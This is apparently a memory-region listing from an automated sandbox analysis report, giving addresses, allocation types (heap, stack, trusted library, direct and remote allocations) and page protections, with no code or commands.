2495A000
trusted library allocation
page read and write
250BA000
trusted library allocation
page read and write
49D000
heap
page read and write
23AF1000
trusted library allocation
page read and write
20DC000
stack
page read and write
10000
heap
page read and write
2B62000
heap
page read and write
10000
heap
page read and write
2F0000
trusted library allocation
page read and write
285000
trusted library allocation
page execute and read and write
1FDEA000
heap
page read and write
1F60000
heap
page read and write
23E7E000
trusted library allocation
page read and write
20BFE000
stack
page read and write
4797000
heap
page read and write
1FC30000
trusted library allocation
page read and write
4EFE000
stack
page read and write
24B7C000
trusted library allocation
page read and write
6340000
heap
page read and write
24422000
trusted library allocation
page read and write
2D9000
heap
page read and write
24924000
trusted library allocation
page read and write
20010000
trusted library allocation
page read and write
23F54000
trusted library allocation
page read and write
2456A000
trusted library allocation
page read and write
31B000
trusted library allocation
page execute and read and write
23C0D000
trusted library allocation
page read and write
8C0000
trusted library allocation
page read and write
1FF60000
trusted library allocation
page read and write
24DB3000
trusted library allocation
page read and write
5D77000
stack
page read and write
2075F000
heap
page read and write
20220000
trusted library allocation
page read and write
27A000
trusted library allocation
page execute and read and write
7D98000
direct allocation
page execute and read and write
251BB000
trusted library allocation
page read and write
2B77000
heap
page read and write
20280000
trusted library allocation
page read and write
23769000
stack
page read and write
B6E000
stack
page read and write
4330000
heap
page read and write
23A79000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
7EF20000
trusted library allocation
page execute and read and write
20340000
trusted library allocation
page read and write
2AEB000
heap
page read and write
230000
direct allocation
page read and write
240000
trusted library allocation
page read and write
28AD000
trusted library allocation
page read and write
4AD9000
heap
page read and write
24440000
trusted library allocation
page read and write
2B3E000
heap
page read and write
25143000
trusted library allocation
page read and write
25A39000
trusted library allocation
page read and write
377000
heap
page read and write
20080000
trusted library allocation
page read and write
2693E000
stack
page read and write
1CFC000
stack
page read and write
21146000
trusted library allocation
page read and write
A00000
trusted library allocation
page read and write
240000
trusted library allocation
page read and write
2456D000
trusted library allocation
page read and write
4B7000
trusted library allocation
page read and write
25ED0000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
4980000
heap
page read and write
10000
heap
page read and write
448D000
stack
page read and write
150000
trusted library allocation
page read and write
530E000
stack
page read and write
250000
trusted library allocation
page execute and read and write
306000
trusted library allocation
page execute and read and write
2463E000
trusted library allocation
page read and write
23AAA000
trusted library allocation
page read and write
2E3000
trusted library allocation
page execute and read and write
4B3F000
heap
page read and write
288000
trusted library allocation
page read and write
24B05000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
19E000
stack
page read and write
205EE000
stack
page read and write
232DE000
stack
page read and write
23AFE000
trusted library allocation
page read and write
258000
trusted library allocation
page read and write
24AF8000
trusted library allocation
page read and write
35AC000
remote allocation
page execute and read and write
250E000
stack
page read and write
30D9000
heap
page read and write
247E000
stack
page read and write
7EF20000
trusted library allocation
page execute and read and write
3D4000
heap
page read and write
466000
heap
page read and write
235FC000
stack
page read and write
259D8000
trusted library allocation
page read and write
20A3C000
stack
page read and write
636000
heap
page read and write
239D3000
trusted library allocation
page read and write
3E4C000
stack
page read and write
655000
heap
page read and write
20F4D000
trusted library allocation
page read and write
214000
trusted library allocation
page read and write
204B0000
trusted library allocation
page read and write
496E000
stack
page read and write
20220000
trusted library allocation
page read and write
24615000
trusted library allocation
page read and write
2336C000
stack
page read and write
200000
direct allocation
page read and write
519E000
stack
page read and write
252C0000
trusted library allocation
page read and write
267000
trusted library allocation
page execute and read and write
1ECD000
heap
page read and write
2647B000
trusted library allocation
page read and write
6ED000
heap
page read and write
20E8D000
trusted library allocation
page read and write
488F000
heap
page read and write
E48000
trusted library allocation
page read and write
2483000
trusted library allocation
page read and write
1F7E000
stack
page read and write
510D000
stack
page read and write
24094000
trusted library allocation
page read and write
24912000
trusted library allocation
page read and write
2350C000
stack
page read and write
4DDA000
heap
page read and write
24A6D000
trusted library allocation
page read and write
30FE000
heap
page read and write
238FE000
stack
page read and write
400000
heap
page execute and read and write
24A2F000
trusted library allocation
page read and write
2390F000
stack
page read and write
3DE0000
heap
page read and write
23F83000
trusted library allocation
page read and write
26E4D000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
97F000
stack
page read and write
257D2000
trusted library allocation
page read and write
25892000
trusted library allocation
page read and write
757000
trusted library allocation
page read and write
24813000
trusted library allocation
page read and write
24185000
trusted library allocation
page read and write
23F2D000
trusted library allocation
page read and write
282000
trusted library allocation
page read and write
2546B000
trusted library allocation
page read and write
2F92000
trusted library allocation
page read and write
208C8000
trusted library allocation
page read and write
4BD000
heap
page read and write
20230000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
20080000
trusted library allocation
page read and write
20700000
heap
page read and write
24E92000
trusted library allocation
page read and write
20220000
trusted library allocation
page read and write
246D3000
trusted library allocation
page read and write
276A000
trusted library allocation
page read and write
26580000
trusted library allocation
page read and write
25060000
heap
page read and write
23D90000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
45F4000
heap
page execute and read and write
203C0000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
243B3000
trusted library allocation
page read and write
24327000
trusted library allocation
page read and write
3D10000
heap
page read and write
329000
heap
page read and write
2554A000
trusted library allocation
page read and write
2566C000
trusted library allocation
page read and write
4950000
heap
page read and write
30FA000
heap
page read and write
24AA6000
trusted library allocation
page read and write
20000
heap
page read and write
4A50000
heap
page read and write
2BD0000
heap
page read and write
64E000
heap
page read and write
AD000
trusted library allocation
page execute and read and write
29D2000
trusted library allocation
page read and write
53E000
stack
page read and write
25AFC000
trusted library allocation
page read and write
24AB9000
trusted library allocation
page read and write
100000
direct allocation
page read and write
2481B000
trusted library allocation
page read and write
2C0A000
heap
page read and write
254A0000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
66D000
trusted library allocation
page execute and read and write
2054D000
stack
page read and write
B70000
direct allocation
page read and write
241C5000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
4930000
direct allocation
page read and write
36CF000
stack
page read and write
2462C000
trusted library allocation
page read and write
6030000
heap
page read and write
23C3C000
trusted library allocation
page read and write
23E5A000
trusted library allocation
page read and write
26FB0000
trusted library allocation
page read and write
4750000
direct allocation
page read and write
225C000
remote allocation
page execute and read and write
2B89000
heap
page read and write
300000
heap
page read and write
24C2B000
trusted library allocation
page read and write
30FA000
heap
page read and write
24767000
trusted library allocation
page read and write
33EE000
stack
page read and write
2490000
trusted library allocation
page execute and read and write
4470000
trusted library allocation
page read and write
4920000
trusted library allocation
page read and write
23B1F000
trusted library allocation
page read and write
5C0000
remote allocation
page read and write
23B5D000
trusted library allocation
page read and write
23937000
trusted library allocation
page read and write
1F0000
trusted library section
page read and write
E9C000
stack
page read and write
24D70000
heap
page read and write
23FB9000
trusted library allocation
page read and write
23FD6000
trusted library allocation
page read and write
226CB000
trusted library allocation
page read and write
2A5E000
stack
page read and write
EC0000
trusted library allocation
page read and write
EB2000
trusted library allocation
page read and write
23C84000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
23ECE000
stack
page read and write
5F52000
heap
page read and write
E0000
trusted library allocation
page read and write
1FDF0000
trusted library allocation
page read and write
40E0000
heap
page read and write
21AC000
remote allocation
page execute and read and write
3F0000
heap
page read and write
23BAE000
trusted library allocation
page read and write
2FD000
trusted library allocation
page execute and read and write
5E07000
stack
page read and write
2490000
trusted library allocation
page read and write
246A3000
trusted library allocation
page read and write
2430E000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
608F000
stack
page read and write
2557C000
trusted library allocation
page read and write
49BD000
stack
page read and write
10000
heap
page read and write
263C7000
trusted library allocation
page read and write
124000
trusted library allocation
page read and write
22F0D000
stack
page read and write
10000
heap
page read and write
2401D000
trusted library allocation
page read and write
24599000
trusted library allocation
page read and write
201CD000
stack
page read and write
425000
heap
page read and write
23B68000
trusted library allocation
page read and write
23EA1000
trusted library allocation
page read and write
1FC33000
trusted library allocation
page read and write
264F1000
trusted library allocation
page read and write
21DC9000
trusted library allocation
page read and write
49F0000
heap
page read and write
20500000
trusted library allocation
page read and write
24612000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
253B9000
trusted library allocation
page read and write
2E88000
trusted library allocation
page read and write
3A31000
heap
page read and write
20280000
trusted library allocation
page read and write
25FF2000
trusted library allocation
page read and write
2038D000
stack
page read and write
24035000
trusted library allocation
page read and write
870000
trusted library allocation
page read and write
23873000
trusted library allocation
page read and write
23D2E000
trusted library allocation
page read and write
2522E000
trusted library allocation
page read and write
4AE9000
heap
page read and write
1FC30000
trusted library allocation
page read and write
25008000
trusted library allocation
page read and write
23855000
trusted library allocation
page read and write
4E5F000
stack
page read and write
24969000
trusted library allocation
page read and write
51FF000
stack
page read and write
C50000
trusted library allocation
page execute and read and write
24ACD000
trusted library allocation
page read and write
25795000
trusted library allocation
page read and write
45B0000
direct allocation
page read and write
20360000
trusted library allocation
page read and write
24DD2000
trusted library allocation
page read and write
26E48000
trusted library allocation
page read and write
26845000
trusted library allocation
page read and write
529D000
stack
page read and write
20220000
trusted library allocation
page read and write
2446000
trusted library allocation
page read and write
A0000
direct allocation
page read and write
370000
heap
page execute and read and write
2F5000
stack
page read and write
20070000
trusted library allocation
page read and write
20D60000
heap
page execute and read and write
835000
heap
page read and write
20880000
heap
page read and write
3DEA000
heap
page read and write
6D8000
heap
page read and write
25DEB000
trusted library allocation
page read and write
20E89000
trusted library allocation
page read and write
B50000
direct allocation
page read and write
2D7000
stack
page read and write
20280000
trusted library allocation
page read and write
214000
heap
page read and write
206E8000
stack
page read and write
1FE07000
heap
page read and write
26C53000
trusted library allocation
page read and write
23923000
trusted library allocation
page read and write
90000
direct allocation
page read and write
1FC30000
trusted library allocation
page read and write
454000
heap
page read and write
26146000
trusted library allocation
page read and write
23E56000
trusted library allocation
page read and write
51AE000
stack
page read and write
23C25000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
4540000
trusted library allocation
page read and write
253C5000
trusted library allocation
page read and write
251BF000
trusted library allocation
page read and write
2180000
trusted library allocation
page read and write
AD0000
trusted library allocation
page read and write
23D52000
trusted library allocation
page read and write
2549A000
trusted library allocation
page read and write
248F5000
trusted library allocation
page read and write
23EE8000
trusted library allocation
page read and write
A60000
trusted library allocation
page read and write
23EB9000
trusted library allocation
page read and write
29CA000
trusted library allocation
page read and write
E0000
direct allocation
page read and write
90000
trusted library allocation
page read and write
3B4000
heap
page read and write
24A3B000
trusted library allocation
page read and write
22CC0000
heap
page read and write
24698000
trusted library allocation
page read and write
1FF66000
trusted library allocation
page read and write
23EF5000
trusted library allocation
page read and write
1E0000
direct allocation
page read and write
2F2000
heap
page read and write
4750000
direct allocation
page read and write
100000
direct allocation
page read and write
47A0000
direct allocation
page read and write
26C4E000
trusted library allocation
page read and write
52EF000
stack
page read and write
1FC50000
trusted library allocation
page read and write
1FFEE000
stack
page read and write
820000
heap
page read and write
1FC50000
trusted library allocation
page read and write
2481F000
trusted library allocation
page read and write
475000
heap
page read and write
23AC2000
trusted library allocation
page read and write
26155000
trusted library allocation
page read and write
24779000
trusted library allocation
page read and write
20E85000
trusted library allocation
page read and write
49B0000
direct allocation
page read and write
150000
remote allocation
page read and write
2049C000
stack
page read and write
4B1C000
heap
page read and write
254BE000
trusted library allocation
page read and write
297F000
stack
page read and write
23E4D000
trusted library allocation
page read and write
209B0000
heap
page read and write
260C4000
trusted library allocation
page read and write
2484D000
trusted library allocation
page read and write
248C0000
trusted library allocation
page read and write
4FCE000
stack
page read and write | page guard
1FC60000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
2524D000
trusted library allocation
page read and write
2377C000
stack
page read and write
20CEC000
trusted library allocation
page read and write
23A9F000
trusted library allocation
page read and write
23C9D000
trusted library allocation
page read and write
930000
trusted library allocation
page read and write
8E0000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
4A12000
heap
page read and write
4B9E000
stack
page read and write
23F47000
trusted library allocation
page read and write
2686E000
stack
page read and write
2336D000
stack
page read and write
29A6000
trusted library allocation
page read and write
4D2E000
stack
page read and write
23A9B000
trusted library allocation
page read and write
25B14000
trusted library allocation
page read and write
2F32000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
20351000
trusted library allocation
page read and write
20270000
trusted library allocation
page read and write
239EB000
trusted library allocation
page read and write
23ACD000
stack
page read and write
44F000
heap
page read and write
2BC000
stack
page read and write
2362F000
stack
page read and write
560000
heap
page read and write
258F1000
trusted library allocation
page read and write
23D38000
trusted library allocation
page read and write
1FC31000
trusted library allocation
page read and write
3469000
trusted library allocation
page read and write
24185000
trusted library allocation
page read and write
24702000
trusted library allocation
page read and write
253A1000
trusted library allocation
page read and write
8D5C000
direct allocation
page execute and read and write
23F0C000
trusted library allocation
page read and write
BE2000
trusted library allocation
page read and write
26521000
trusted library allocation
page read and write
A80000
trusted library allocation
page read and write
26FF000
trusted library allocation
page read and write
8A0000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
E4D000
trusted library allocation
page execute and read and write
250E9000
trusted library allocation
page read and write
248CB000
trusted library allocation
page read and write
359F000
stack
page read and write
23E5A000
trusted library allocation
page read and write
251A2000
trusted library allocation
page read and write
26568000
trusted library allocation
page read and write
5FC0000
heap
page read and write
1DEE000
stack
page read and write
4460000
direct allocation
page read and write
30B0000
heap
page read and write
240A4000
trusted library allocation
page read and write
2414E000
trusted library allocation
page read and write
24767000
trusted library allocation
page read and write
243A0000
trusted library allocation
page read and write
1E70000
heap
page read and write
2465C000
trusted library allocation
page read and write
257E000
trusted library allocation
page read and write
2702A000
trusted library allocation
page read and write
220000
trusted library allocation
page read and write
2540C000
trusted library allocation
page read and write
21C61000
trusted library allocation
page read and write
57B000
heap
page read and write
4600000
trusted library allocation
page read and write
52AF000
stack
page read and write
32D000
heap
page read and write
23EE2000
trusted library allocation
page read and write
1EB000
stack
page read and write
2B90000
heap
page read and write
B70000
trusted library allocation
page read and write
232000
heap
page read and write
684000
heap
page read and write
300000
trusted library allocation
page read and write
2114C000
trusted library allocation
page read and write
2407C000
trusted library allocation
page read and write
1E2000
heap
page read and write
5096000
heap
page read and write
2348E000
stack
page read and write
240EF000
trusted library allocation
page read and write
616E000
stack
page read and write
2E0000
trusted library allocation
page execute and read and write
23E4D000
trusted library allocation
page read and write
24005000
trusted library allocation
page read and write
203C0000
trusted library allocation
page read and write
28AF000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
25D35000
trusted library allocation
page read and write
5A7000
heap
page read and write
643000
heap
page read and write
5CB000
unkown
page readonly
25238000
trusted library allocation
page read and write
4D7E000
stack
page read and write
466000
heap
page read and write
1D0000
heap
page read and write
20282000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
34F000
heap
page read and write
2ED000
trusted library allocation
page execute and read and write
51BB000
stack
page read and write
23980000
heap
page read and write
4780000
direct allocation
page read and write
24ABE000
trusted library allocation
page read and write
1FC32000
trusted library allocation
page read and write
663000
trusted library allocation
page execute and read and write
4F4B000
heap
page read and write
2A7000
heap
page read and write
21D000
trusted library allocation
page execute and read and write
1FC30000
trusted library allocation
page read and write
612E000
stack
page read and write
23FEB000
trusted library allocation
page read and write
4470000
direct allocation
page read and write
26F0B000
trusted library allocation
page read and write
20768000
stack
page read and write
24644000
trusted library allocation
page read and write
2085E000
stack
page read and write
1FD10000
trusted library allocation
page read and write
2BF5000
heap
page read and write
20070000
trusted library allocation
page read and write
23EC9000
trusted library allocation
page read and write
5E42000
heap
page read and write
6F5000
heap
page read and write
44B000
heap
page read and write
210000
direct allocation
page read and write
243AB000
trusted library allocation
page read and write
24A5F000
trusted library allocation
page read and write
1FC000
stack
page read and write
240000
direct allocation
page read and write
2071C000
stack
page read and write
49D0000
trusted library allocation
page read and write
646000
heap
page read and write
1FC40000
trusted library allocation
page read and write
4576000
heap
page execute and read and write
23D1A000
trusted library allocation
page read and write
62DF000
stack
page read and write
2404A000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
2512B000
trusted library allocation
page read and write
20070000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
46C0000
direct allocation
page read and write
2974000
trusted library allocation
page read and write
24989000
trusted library allocation
page read and write
1FC50000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
6B0000
trusted library allocation
page read and write
49E0000
trusted library allocation
page read and write
F4E000
stack
page read and write
23ADA000
trusted library allocation
page read and write
2331C000
stack
page read and write
25C6E000
stack
page read and write
44F0000
direct allocation
page read and write
2880000
trusted library allocation
page read and write
5300000
heap
page read and write
48D0000
trusted library allocation
page execute and read and write
2471A000
trusted library allocation
page read and write
5A0000
heap
page read and write
27DF000
stack
page read and write
44E000
heap
page read and write
20AB0000
heap
page execute and read and write
285000
heap
page read and write
1C0000
trusted library allocation
page execute and read and write
200CF000
stack
page read and write
24568000
trusted library allocation
page read and write
24AED000
trusted library allocation
page read and write
270A7000
trusted library allocation
page read and write
4B00000
direct allocation
page read and write
281F000
stack
page read and write
23ED0000
trusted library allocation
page read and write
20DCF000
trusted library allocation
page read and write
23C6B000
heap
page read and write
25577000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
69E7000
trusted library allocation
page read and write
517E000
stack
page read and write
17A0000
remote allocation
page execute and read and write
528E000
stack
page read and write
4B0000
trusted library allocation
page read and write
45C000
heap
page read and write
260E000
stack
page read and write
20280000
trusted library allocation
page read and write
2440A000
trusted library allocation
page read and write
468A000
heap
page read and write
4E28000
heap
page read and write
2534E000
trusted library allocation
page read and write
23CD2000
trusted library allocation
page read and write
20DDE000
stack
page read and write
26C35000
trusted library allocation
page read and write
60BF000
stack
page read and write
203B0000
trusted library allocation
page read and write
248E3000
trusted library allocation
page read and write
3B0000
trusted library allocation
page read and write
4AE000
heap
page read and write
23ED8000
trusted library allocation
page read and write
20280000
trusted library allocation
page read and write
24EC2000
trusted library allocation
page read and write
24981000
trusted library allocation
page read and write
265DB000
trusted library allocation
page read and write
1FB0000
direct allocation
page read and write
1FDA0000
trusted library allocation
page read and write
25D67000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
4860000
remote allocation
page read and write
790000
heap
page read and write
2618C000
trusted library allocation
page read and write
20220000
trusted library allocation
page read and write
3194000
heap
page read and write
25233000
trusted library allocation
page read and write
202ED000
stack
page read and write
5EBF000
stack
page read and write
202F6000
trusted library allocation
page read and write
26EED000
trusted library allocation
page read and write
24FD8000
trusted library allocation
page read and write
4AC0000
heap
page read and write
B40000
trusted library allocation
page read and write
23E18000
trusted library allocation
page read and write
446C000
stack
page read and write
2E4000
trusted library allocation
page read and write
25278000
trusted library allocation
page read and write
425000
heap
page read and write
520C000
stack
page read and write
660000
trusted library allocation
page read and write
239F9000
trusted library allocation
page read and write
20340000
trusted library allocation
page read and write
50CE000
stack
page read and write
44CF000
stack
page read and write
20D4F000
trusted library allocation
page read and write
2028D000
trusted library allocation
page read and write
4E6D000
heap
page read and write
23ACD000
trusted library allocation
page read and write
315000
trusted library allocation
page execute and read and write
1FC30000
trusted library allocation
page read and write
203C0000
trusted library allocation
page read and write
23E7E000
trusted library allocation
page read and write
5E0000
heap
page read and write
2446000
trusted library allocation
page read and write
2535A000
trusted library allocation
page read and write
20220000
trusted library allocation
page read and write
526000
heap
page read and write
246D2000
trusted library allocation
page read and write
200AD000
stack
page read and write
1FC50000
trusted library allocation
page read and write
455E000
stack
page read and write
20340000
trusted library allocation
page read and write
24EF1000
trusted library allocation
page read and write
23F24000
trusted library allocation
page read and write
23C12000
trusted library allocation
page read and write
247F5000
trusted library allocation
page read and write
25505000
trusted library allocation
page read and write
20000
heap
page read and write
500000
trusted library allocation
page read and write
27BF000
stack
page read and write
44E0000
direct allocation
page read and write
4610000
heap
page execute and read and write
22E0000
heap
page read and write
1FC30000
trusted library allocation
page read and write
A3000
trusted library allocation
page execute and read and write
4B7E000
stack
page read and write
24F68000
trusted library allocation
page read and write
32F0000
heap
page read and write
25635000
trusted library allocation
page read and write
20600000
heap
page read and write
210000
heap
page read and write
2399A000
trusted library allocation
page read and write
2375C000
stack
page read and write
E44000
trusted library allocation
page read and write
237CE000
stack
page read and write
30EC000
heap
page read and write
20340000
trusted library allocation
page read and write
FAD000
stack
page read and write
26219000
heap
page read and write
250E4000
trusted library allocation
page read and write
2408B000
trusted library allocation
page read and write
25260000
trusted library allocation
page read and write
24DB8000
trusted library allocation
page read and write
4440000
direct allocation
page read and write
24AF000
stack
page read and write
2180000
heap
page read and write
4C88000
heap
page read and write
4CFD000
stack
page read and write
209AE000
stack
page read and write
24A8E000
trusted library allocation
page read and write
6A4000
heap
page read and write
23F0E000
stack
page read and write
20280000
trusted library allocation
page read and write
2AE8000
heap
page read and write
25400000
trusted library allocation
page read and write
B60000
direct allocation
page read and write
2368C000
stack
page read and write
80000
direct allocation
page read and write
30C000
heap
page read and write
2401D000
trusted library allocation
page read and write
1FC60000
trusted library allocation
page read and write
23D47000
trusted library allocation
page read and write
1FC30000
trusted library allocation
page read and write
245B6000
trusted library allocation
page read and write
23F5F000
trusted library allocation
page read and write
22468000
trusted library allocation
page read and write
296E000
trusted library allocation
page read and write
24C85000
trusted library allocation
page read and write
246A3000
trusted library allocation
page read and write
470C000
stack
page read and write
23B48000
trusted library allocation
page read and write
1FC7A000
heap
page read and write
AAA000
heap
page read and write
23F00000
trusted library allocation
page read and write
48BE000
stack
page read and write
930000
trusted library allocation
page read and write
25909000
trusted library allocation
page read and write
220E9000
trusted library allocation
page read and write
2503E000
trusted library allocation
page read and write
23DA8000
trusted library allocation
page read and write
257E000
trusted library allocation
page read and write
330000
heap
page read and write
23C56000
trusted library allocation
page read and write
246A3000
trusted library allocation
page read and write
2364E000
stack
page read and write
23E4A000
trusted library allocation
page read and write
248AB000
trusted library allocation
page read and write
4470000
trusted library allocation
page read and write
20220000
trusted library allocation
page read and write
25C2D000
trusted library allocation
page read and write
2675B000
trusted library allocation
page read and write
1FC53000
trusted library allocation
page read and write
208E9000
heap
page read and write
212D000
stack
page read and write
24912000
trusted library allocation
page read and write
25B8A000
trusted library allocation
page read and write
23E1D000
trusted library allocation
page read and write
23F5F000
trusted library allocation
page read and write
E50000
trusted library allocation
page read and write
There are 3456 hidden memdumps, click here to show them.